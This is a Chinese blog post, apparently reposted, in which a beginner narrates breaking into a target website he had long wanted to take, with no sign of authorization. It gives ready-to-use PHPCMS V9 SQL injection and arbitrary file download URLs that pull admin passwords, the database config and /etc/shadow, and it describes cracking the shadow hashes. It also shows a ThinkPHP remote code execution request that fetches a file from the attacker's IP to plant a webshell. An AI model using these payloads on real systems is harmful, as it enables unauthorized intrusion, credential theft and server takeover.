记一次期待已久的渗透从phpcms到thinkphp

我就是我 2021-11-19 15:22 402阅读 0赞

# 0X01 前言  #

这是刚刚开始学习渗透的一个目标吧 这个站从刚开始学的那一天起，就想把他日下来。

可能是自己的信息收集能力太差了吧，导致一直无从下手 没有进展。这是需要慢慢积累的过程。还需努力学习。

# 0X02小白渗透 #

在刚刚开始的时候，一顿乱扫 什么子域名 C段 旁站 端口 ip 服务 目录 指纹 waf都照着网上的方法做，但是你不知道你扫这些干嘛，扫下来又有什么意义呐？

这是我对这些的理解 如有不足希望多多交流

1旁站 
    旁站就是同一ip上面的不同的站 比如iis 下面有两个www.xxx.xom和www.xxx2.com
    这就互称为旁站 你拿下其中任意一个另外一个就是你的了 但是如果开了其他服务 那么就不能再80端口占用
    2C段
    假如你的ip是192.168.1.1那么192.168.1.1-254都属这个段内 这就是C段 ，一般很难入侵，思路有内网下面的各种未授权访问入侵
    3端口 
    看对应端口开放了那些服务 找漏洞 
    4指纹系统
    快速准确的识别网站语言，cms等等 不用你去尝试 浪费时间
    5waf识别 
    sqlmap的参数
    python2 sqlmap.py -u "https://www.example.com" --identify-waf --batch
    或者用Wafw00f 这个工具
    6目录
    敏感目录

从刚开始学习渗透的时候思路 找注入点 注入登陆后台拿shell 当时也只会找id=1这些位置的地方的参数然后扔到sqlmap里面一顿乱扫

当然 这个站是不可能有id=1这些这么粗俗的注入点的

然后 就......找不到 然后robots里面看见了很多东西 但是也只看见一个admin.php 然后什么思路都没有 就这样 就放着放着 心想慢慢学吧 总会拿下的。

# 0X03开始有点入门了 #

指纹 知道了phpcms Google 搜索一波phpcmsV9 getshell

有一个前台直接getshell？？？

http://ximcx.cn/post-126.html 这里西门老师讲的很清楚

但是我们的站不开放注册功能 没有前台用户 甚至这可能是一个自己改版的phpcms

![1675852-20190717141745154-1912822699.png][]

那么前台直接getshell无果后 还有一个注入

第一步 得到用户认证cookie

/index.php?m=wap&c=index&a=init&siteid=1

第二步

userid_flash=686dzK2pLsN_cv_pbJlCjvsm-ex_mCiOG90mXzt4 传给userid_flash
    并且构造你的sql语句

/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27+and+updatexml(1%2cconcat(1%2c((select+password+from+v9_admin+limit+0%2c1)))%2c1)%23%26m%3d1%26f%3dhaha%26modelid%3d2%26catid%3d7%26

这里要编码 然后得到返回穿参给第三步

第三步

/index.php?m=content&c=down&a_k=

发包 updataxml报错注入

进行这个站点的测试两天了 
    框架PHPCMS V9
    1思路 注入点是root 写shell 知道路径 可以用union联合写  但是 遇到问题说 
    　1、限制mysqld 不允许导入 | 导出
    　   　   --secure_file_prive=null
    2思路二 堆叠注入 在admin表里面加入我自己的用户 但是堆叠注入不可用
    3 8080开放WDCP弱密码爆破无果 爆破了一波目录 没有什么可用的价值
    4利用注入点 读取wdcp账户密码 但是 phpcmsv9这里用的是updataxml报错注入 
    SELECT * FROM `网站的v9数据库名`.`cd_download_data` WHERE `id` = '' and updatexml(1,concat(1,((select passwd from wd_member where table_schema=wdcpdb limit 0,1))),1)#' LIMIT 1
    MySQL Error : Table '网站的v9数据库名.wd_member' doesn't exist 
    这里报错只能在网站库里面查询 我思路少 求指教 也无果
    5希望师傅们多多交流 ，小白我太难了

这是我当时在T00ls的求助 这里面都是我所遇到的问题 所以从注入点上手也得放弃

思路三 phpcmsV9.2任意文件下载 虽然没开外连 但是心想 我把他数据库密码 和ssh密码读取出来 xshell直连 或者拿这些密码去碰撞一下后台的密码也是行的啊

这里遇到问题了 由于服务器是kali不是windows 但是这个cms过滤了php的文件下载 我们构造文件名需要让liuxn解析成php这里我的构造方法

phpcms过滤\*和/\\ 我们再本机上面测试 1.php空格 1.php\*都可以被当成我们的1.php解析 但是这里我构造1.php\*不知道为什么不行 试了好久1.php空格才行的

![1675852-20190717143303896-207880143.png][]

http://www.ccc.com/index.php?m=attachment&c=attachments&a=swfupload_json&src=a%26i=1%26m=1%26catid=1%26f=.%2*fcaches%2*fconfigs%2*fdatabase.php%2*520%2526modelid%3d1%2526d%3d1%26aid%3d1

index.php?m=content&c=down&a=init&a_k=

第一个下载的文件 当然是数据库配置文件 查看密码 然后弱口令撞密码

![1675852-20190717143628358-1971406555.png][]

第二个读取的是/etc/shadow/然后hash跑密码 但是无奈 跑出来了 但是22端口不对外开放 。。。

看网上说auth\_key好像有点用 于是尝试行的读取一下 结果就是这个尝试 转变就到来了 读出了一个旁站！！！！！！！！！！！！！！！！！！！

![1675852-20190717145620702-671945342.png][]

都懂了吧 这个用其他旁站扫描工具扫描的时候 没扫出来

![1675852-20190717144551476-795496177.png][]

![1675852-20190717144342851-800533073.png][]

然后TK远程代码执行 这里也是试了很久 ban了很多函数 只能执行phpinfo最后直接用简单粗暴的方法

http://xxxx/?s=captcha&Fuck=copy("http://你的ip/50.txt","test.php")

_method=__construct&filter=assert&method=get&server[REQUEST_METHOD]=Fuck

最后 终于 终于

![1675852-20190717145806278-221696219.png][]

学习之路 少就是多 慢就是快

转载于:https://www.cnblogs.com/-zhong/p/11201064.html

[1675852-20190717141745154-1912822699.png]: /images/20211119/d957304f7765492a9717d36dcb48b977.png
[1675852-20190717143303896-207880143.png]: /images/20211119/bd5616ca423f4a2686f5b365216a6415.png
[1675852-20190717143628358-1971406555.png]: /images/20211119/fe81bb7936c74c23bd2aa47a04fd38c3.png
[1675852-20190717145620702-671945342.png]: /images/20211119/10bdabeb88314e7cb2b354d6920ca2f7.png
[1675852-20190717144551476-795496177.png]: /images/20211119/b2820398c1dc4fca84e998acf1a5ec90.png
[1675852-20190717144342851-800533073.png]: /images/20211119/800cafc62f594cafae72fbf66685a4c4.png
[1675852-20190717145806278-221696219.png]: /images/20211119/0e2f1926c6f9414095559b35c571c768.png